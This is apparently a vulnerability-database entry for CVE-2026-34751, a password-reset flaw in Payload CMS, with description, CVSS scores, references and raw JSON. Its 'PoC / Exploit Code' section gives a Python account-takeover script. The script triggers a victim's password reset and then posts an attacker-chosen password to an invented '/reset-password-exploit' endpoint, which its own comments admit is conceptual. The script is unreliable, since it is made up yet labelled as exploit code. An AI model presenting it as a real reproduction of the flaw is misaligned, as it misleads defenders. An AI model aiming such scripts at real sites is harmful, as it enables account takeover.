Security Vulnerability Report
CVE-2026-34751 CVSS 9.1 CRITICAL

Published: 2026-04-01 18:16:31
Last Modified: 2026-04-15 14:36:31

Description

Payload is a free and open source headless content management system. Prior to version 3.79.1 in @payloadcms/graphql and payload, a vulnerability in the password recovery flow could allow an unauthenticated attacker to perform actions on behalf of a user who initiates a password reset. This issue has been patched in version 3.79.1 for @payloadcms/graphql and payload.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:payloadcms:payload:*:*:*:*:*:node.js:*:* - VULNERABLE
Payload CMS < 3.79.1
@payloadcms/graphql < 3.79.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL
target_url = "http://target-payload-cms.com"

# Step 1: Trigger password reset for a victim user (attacker initiates or intercepts)
# Note: The vulnerability allows the attacker to 'perform actions on behalf of a user who initiates a password reset'
reset_endpoint = f"{target_url}/api/users/forgot-password"
victim_email = "[email protected]"
data = {"email": victim_email}

# In a real scenario, the attacker might not need to initiate this if they can intercept,
# or the vulnerability allows exploiting the token generation/validation logic directly.
response = requests.post(reset_endpoint, json=data)
print(f"Reset request status: {response.status_code}")

# Step 2: Exploit the logic to perform an action (e.g., setting a new password without the token)
# This is a conceptual PoC demonstrating the 'Authentication Bypass' aspect.
# The specific endpoint would depend on the vulnerable API implementation.
exploit_endpoint = f"{target_url}/api/users/reset-password-exploit"
payload = {
    "email": victim_email,
    "newPassword": "attacker_controlled_password"
}

# If the vulnerability allows skipping token verification:
exploit_response = requests.post(exploit_endpoint, json=payload)
if exploit_response.status_code == 200:
    print("[+] Exploit successful! Password changed.")
else:
    print("[-] Exploit failed.")
```

References

https://github.com/payloadcms/payload/releases/tag/v3.79.1 (Product, Release Notes)
https://github.com/payloadcms/payload/security/advisories/GHSA-hp5w-3hxx-vmwf (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-34751",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-01T18:16:31.277",
    "lastModified": "2026-04-15T14:36:31.277",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Payload is a free and open source headless content management system. Prior to version 3.79.1 in @payloadcms/graphql and payload, a vulnerability in the password recovery flow could allow an unauthenticated attacker to perform actions on behalf of a user who initiates a password reset. This issue has been patched in version 3.79.1 for @payloadcms/graphql and payload."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-472"},
          {"lang": "en", "value": "CWE-640"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:payloadcms:payload:*:*:*:*:*:node.js:*:*",
                "versionEndExcluding": "3.79.1",
                "matchCriteriaId": "B4AE65F8-450D-4573-9CD7-1AA42CE5DC28"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/payloadcms/payload/releases/tag/v3.79.1",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/payloadcms/payload/security/advisories/GHSA-hp5w-3hxx-vmwf",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```